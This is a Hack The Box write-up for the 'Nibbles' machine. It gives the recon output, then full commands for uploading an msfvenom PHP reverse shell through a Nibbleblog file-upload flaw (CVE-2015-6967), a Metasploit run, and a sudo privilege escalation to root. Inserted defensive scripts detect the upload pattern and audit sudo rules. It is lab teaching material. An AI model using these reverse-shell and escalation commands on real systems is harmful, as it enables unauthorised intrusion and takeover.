🕵 HTB-Writeup : NIBBLES

Recon

nmap

nmap -A -sV -Pn 10.10.10.75

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We are faced with a website that only shows a "Hello world!" page.

gobuster

No result from gobuster. I was not able to find any directories or files.

After some time, I looked up whether Nibbles or Nibble was a web service or an application I did not know about. I found that Nibbleblog is a blog engine written in PHP.

We can then find the link to the main page at: http://10.10.10.75/nibbleblog/

[Screenshot of the Nibbleblog page]

We rerun the gobuster scan against /nibbleblog/.

===============================================================
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] 
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]  
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]                                            
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
                                                                                              
===============================================================

Vulnerabilities

Thanks to Exploit-DB (searchsploit), we can see that there are 2 vulnerabilities listed for Nibbleblog.

└─$ searchsploit nibble       
-------------------------------------------------------------------------------------------
 Exploit Title                                           |  Path
-------------------------------------------------------------------------------------------
Nibbleblog 3 - Multiple SQL Injections                   | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)    | php/remote/38489.rb
-------------------------------------------------------------------------------------------

One of these vulnerabilities has been assigned CVE-2015-6967. I found an exploit on GitHub, let's try it!

Exploit

W/o Metasploit

For the exploit, we need to provide:

  • url
  • username
  • password
  • payload

Browsing through the directories, I found a users.xml file that lists a user, here admin.


Trying some default and guessed passwords on the admin login page http://10.10.10.75/nibbleblog/admin.php, I found the credentials admin:nibbles.

For the payload, I used msfvenom to create a PHP reverse shell. Then I passed this payload to the Python script.

# creating our php reverse shell payload
└─$ msfvenom -p php/reverse_php LHOST=10.10.16.6 LPORT=4444 > shell.php

└─$ python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.

The exploit seems to be successful. We can see that an image has been uploaded; it corresponds to our reverse shell.


We simply browse to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php to trigger our shell. Don't forget to listen with netcat on the port specified in the payload.
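From the defender's side, the trace this leaves in the web server logs is distinctive: a POST to the admin panel followed shortly by a GET of a .php file under the plugin upload directory (content/private/plugins/...), which should never execute code. The script below is an added example, not part of the writeup or of Nibbleblog, that scans Apache combined-format access log lines for that pattern. The log lines are constructed for the example; the IP addresses, timestamps and the admin.php/image.php paths mirror the ones seen in this writeup.

```python
import re
from datetime import datetime

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Paths taken from the writeup: the admin panel and the plugin upload directory.
# PHP served from under content/private/plugins/ is the tell-tale sign of the upload.
ADMIN_RE = re.compile(r'^/nibbleblog/admin\.php')
PLUGIN_PHP_RE = re.compile(r'^/nibbleblog/content/private/plugins/[^/]+/[^/]+\.php$')

# Constructed sample log (not captured from the box); the last line is benign traffic.
SAMPLE_LOG = """\
10.10.16.6 - - [05/Aug/2022:22:01:10 +0200] "GET /nibbleblog/ HTTP/1.1" 200 2986
10.10.16.6 - - [05/Aug/2022:22:05:30 +0200] "POST /nibbleblog/admin.php HTTP/1.1" 302 0
10.10.16.6 - - [05/Aug/2022:22:05:41 +0200] "POST /nibbleblog/admin.php HTTP/1.1" 200 4123
10.10.16.6 - - [05/Aug/2022:22:06:44 +0200] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0
10.10.14.3 - - [05/Aug/2022:22:07:00 +0200] "GET /nibbleblog/content/public/upload/photo.jpg HTTP/1.1" 200 5120
"""


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_upload_execution(log_text, window_seconds=600):
    """Return (ip, path, reason) for every request to a .php file under the plugin
    upload directory. The reason is strengthened when the same client POSTed to
    admin.php within the preceding window, which is the upload-then-trigger sequence."""
    last_admin_post = {}   # ip -> timestamp of the latest POST to admin.php
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and ADMIN_RE.match(rec["path"]):
            last_admin_post[rec["ip"]] = rec["ts"]
        elif PLUGIN_PHP_RE.match(rec["path"]):
            reason = "php requested from plugin upload directory"
            post_ts = last_admin_post.get(rec["ip"])
            if post_ts is not None and (rec["ts"] - post_ts).total_seconds() <= window_seconds:
                reason += " shortly after a POST to admin.php"
            alerts.append((rec["ip"], rec["path"], reason))
    return alerts


if __name__ == "__main__":
    for ip, path, reason in find_upload_execution(SAMPLE_LOG):
        print(f"ALERT {ip} {path}: {reason}")
```

The same log pattern is also the argument for the mitigation: the upload directory under content/ should be served with PHP execution disabled (for Apache, a directory-level rule that removes the PHP handler or denies *.php there), so that an uploaded image.php is returned as a file instead of being run.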

We got a shell! We are connected as the user nibbler and can now get the user flag.

whoami
nibbler

cat /home/nibbler/user.txt
*************************7564559

W/ Metasploit

We can load the multi/http/nibbleblog_file_upload module in the Metasploit console, then set our options.

Name        Value
USERNAME    admin
PASSWORD    nibbles
TARGETURI   /nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.XX.X:4444 
[*] Sending stage (39927 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.XX.X:4444 -> 10.10.10.75:37934) at 2022-08-05 22:06:44 +0200

We are now in! Let’s continue to the privesc.

Privesc

Checking the user's sudo privileges, we can see that nibbler can execute the script /home/nibbler/personal/stuff/monitor.sh as root without a password.

sudo -l 
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
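The root cause here is a sudo rule whose target lives inside the invoking user's own home directory (and, on this box, in a subdirectory that does not even exist yet). The script below is an added example, not from the writeup, that audits `sudo -l` output for exactly this weakness: for each NOPASSWD command it walks every path component and flags components that are missing or writable by the user, because sudo trusts the path, not the file's content. The `sudo -l` text and the filesystem view are constructed for the example (the second rule is a hypothetical root-owned script that passes the check); `lookup` defaults to `os.lstat` so it can be run against a real host.

```python
import os
import re
import stat

# Matches rule lines of 'sudo -l' output: (runas) [NOPASSWD:] command
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:)?\s*(?P<cmd>\S+)')

# Constructed 'sudo -l' output, shaped like the one on Nibbles plus a sane rule.
SUDO_L_OUTPUT = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /usr/local/sbin/backup.sh
"""

# Constructed filesystem view: path -> (mode, uid, gid); missing keys mean "does not exist".
# nibbler (uid/gid 1001 assumed) owns her home; personal/ was never created; backup.sh is root's.
FAKE_FS = {
    "/home": (stat.S_IFDIR | 0o755, 0, 0),
    "/home/nibbler": (stat.S_IFDIR | 0o755, 1001, 1001),
    "/usr": (stat.S_IFDIR | 0o755, 0, 0),
    "/usr/local": (stat.S_IFDIR | 0o755, 0, 0),
    "/usr/local/sbin": (stat.S_IFDIR | 0o755, 0, 0),
    "/usr/local/sbin/backup.sh": (stat.S_IFREG | 0o755, 0, 0),
}


def default_lookup(path):
    """Real-host lookup: (mode, uid, gid) of path, or None if it does not exist."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    return (st.st_mode, st.st_uid, st.st_gid)


def parse_sudo_l(output):
    """Extract (runas, nopasswd, command) tuples from 'sudo -l' output."""
    rules = []
    for line in output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if m:
            rules.append((m.group("runas").strip(), bool(m.group("nopasswd")), m.group("cmd")))
    return rules


def path_components(path):
    """/a/b/c -> ['/a', '/a/b', '/a/b/c'], root first."""
    parts = []
    cur = path
    while cur not in ("/", ""):
        parts.append(cur)
        cur = os.path.dirname(cur)
    return list(reversed(parts))


def user_can_write(entry, uid, gids):
    """Classic owner/group/other write check for a (mode, uid, gid) entry."""
    mode, owner, group = entry
    if owner == uid and mode & stat.S_IWUSR:
        return True
    if group in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def assess_rule(cmd, uid, gids, lookup=default_lookup):
    """Explain why uid could control the file that sudo will run; empty list means OK."""
    findings = []
    for p in path_components(cmd):
        entry = lookup(p)
        if entry is None:
            findings.append(f"{p} does not exist: the user can create it")
            break   # everything below a missing component is under user control
        if user_can_write(entry, uid, gids):
            kind = "directory" if stat.S_ISDIR(entry[0]) else "file"
            findings.append(f"{p} is a {kind} writable by the user")
    return findings


def audit(sudo_l_output, uid, gids, lookup=default_lookup):
    """Return [(command, findings)] for every rule whose target the user can tamper with."""
    report = []
    for _runas, _nopasswd, cmd in parse_sudo_l(sudo_l_output):
        if cmd == "ALL":
            report.append((cmd, ["unrestricted command"]))
            continue
        findings = assess_rule(cmd, uid, gids, lookup)
        if findings:
            report.append((cmd, findings))
    return report


if __name__ == "__main__":
    for cmd, findings in audit(SUDO_L_OUTPUT, 1001, {1001}, FAKE_FS.get):
        print(f"RISKY sudo target {cmd}:")
        for f in findings:
            print(f"  - {f}")
```

The fix the audit points at is the usual one: a script run via sudo belongs in a root-owned, root-writable-only location such as /usr/local/sbin with mode 0755, and the sudoers entry should reference that path, never something under a user's home.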

We just have to invoke a shell through that file.

# the directory does not exist yet, so we create it and drop our own monitor.sh inside
$ mkdir -p /home/nibbler/personal/stuff/
$ cd /home/nibbler/personal/stuff/
$ echo "/bin/bash" > monitor.sh
$ chmod +x monitor.sh
$ sudo ./monitor.sh

root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
*************************0da949e

We are now root on the box!

Tags

Easy, External, Nibbleblog, Penetration Tester Level 1, CVE Exploitation, CVE-2015-6967, A06:2021-Vulnerable And Outdated Components, User Enumeration, Sudo Exploitation, Public Vulnerabilities, Security Tools